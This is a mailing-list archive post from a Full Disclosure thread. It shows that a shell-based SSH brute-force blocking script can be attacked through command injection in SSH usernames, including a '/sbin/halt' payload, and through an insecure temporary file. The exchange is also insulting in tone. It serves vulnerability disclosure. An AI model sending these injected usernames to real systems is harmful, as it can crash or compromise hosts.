Full Disclosure mailing list archives
Re: SSH brute force blocking tool
From: Tavis Ormandy <taviso () gentoo org>
Date: Mon, 27 Nov 2006 21:02:31 +0000
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victimSince you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) ///// awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> /tmp/hosts.deny
insecure temporary file creation, race condition if a user can create that file between the unlink and the open. $ ssh "error retrieving"@localhost & ssh '`0wn3d`'@localhost $ awk '/error retrieving/{getline;print $13}' /var/log/authlog `0wn3d` Oops. Thanks, Tavis. -- ------------------------------------- taviso () sdf lonestar org | finger me for my pgp key. ------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)